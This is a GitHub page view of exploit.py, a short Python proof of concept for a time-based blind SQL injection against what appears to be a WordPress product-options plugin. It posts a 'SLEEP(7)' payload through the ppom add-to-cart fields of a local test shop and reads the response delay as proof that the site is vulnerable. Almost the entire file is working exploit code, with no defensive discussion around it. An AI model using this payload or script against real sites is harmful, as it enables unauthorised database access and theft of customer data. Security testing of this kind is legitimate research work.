-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathexploit.py
More file actions
45 lines (35 loc) · 1.64 KB
/
exploit.py
File metadata and controls
45 lines (35 loc) · 1.64 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import requests
import time
PRODUCT_URL = "http://localhost/wp4hacking/product/product-testing/"
def exploit_sql_injection_onestep():
sql_payload = "1 AND (SELECT 1 FROM (SELECT(SLEEP(7)))A)"
add_to_cart_data = {
'add-to-cart': '72',
'quantity': '1',
'ppom[fields][sql_injection]': 'test_value',
'ppom[fields][id]': sql_payload,
'ppom[ppom_option_price]': '""',
}
print("[*] Sending SQL Injection payload...")
start_time = time.time()
try:
response = requests.post(PRODUCT_URL, data=add_to_cart_data, timeout=10)
end_time = time.time()
duration = end_time - start_time
print(f" Request finished in {duration:.2f} seconds (no timeout).")
print("\n[-] FAILED. The site responded too quickly. It does not seem vulnerable.")
except requests.exceptions.ReadTimeout:
end_time = time.time()
duration = end_time - start_time
print(f" Request timed out after {duration:.2f} seconds.")
if duration >= 7:
print("\n[+] SUCCESS! 'Read timed out' occurred because the SLEEP(7) payload was executed.")
print(" The site is vulnerable to Time-Based Blind SQL Injection.")
else:
print("\n[-] FAILED. The timeout occurred too quickly, possibly a server issue.")
except requests.exceptions.RequestException as e:
print(f"[!] An unexpected error occurred: {e}")
if __name__ == "__main__":
print("Attempting SQL Injection PoC (One-Step Method)...")
print("Make sure 'Enable Legacy Price Calculations' is active.")
exploit_sql_injection_onestep()